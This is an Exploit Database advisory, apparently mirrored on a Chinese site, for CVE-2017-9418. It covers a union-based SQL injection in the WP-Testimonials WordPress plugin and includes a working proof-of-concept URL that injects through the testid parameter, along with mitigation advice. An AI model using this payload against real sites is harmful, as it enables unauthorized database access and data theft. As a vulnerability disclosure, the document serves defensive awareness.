WordPress Plugin WP-Testimonials < 3.4.1 - SQL Injection

• Exploit Database
• 39 阅读

• 作者： Dimitrios Tsagkarakis
  日期： 2017-06-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42166/

• # Exploit Title: WP-Testimonials < 3.4.1 Union Based SQL Injection
  # Date: 03-06-2017
  # Exploit Author: Dimitrios Tsagkarakis
  # Website: dtsa.eu 
  # Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/
  # Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/
  # Version: 3.4.1
  # CVE : CVE-2017-9418
  
  # Category: webapps
  
   
  
  1. Description:
  
   
  
  SQL injection vulnerability in the WP-Testimonials plugin 3.4.1 for
  WordPress allows an authenticated user to execute arbitrary SQL commands via
  the testid parameter to wp-admin/admin.php.
  
  2. Proof of Concept:
  
  http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedi
  t&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL--
  comment
  
  3. Solution:
  
   
  
  The plugin has been removed from WordPress. Deactivate the plug-in and wait
  for a hotfix.
  
   
  
  4. Reference:
  
  http://dtsa.eu/wp-testimonials-wordpress-plugin-v-3-4-1-union-based-sql-inje
  ction-sqli/
  
  http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9418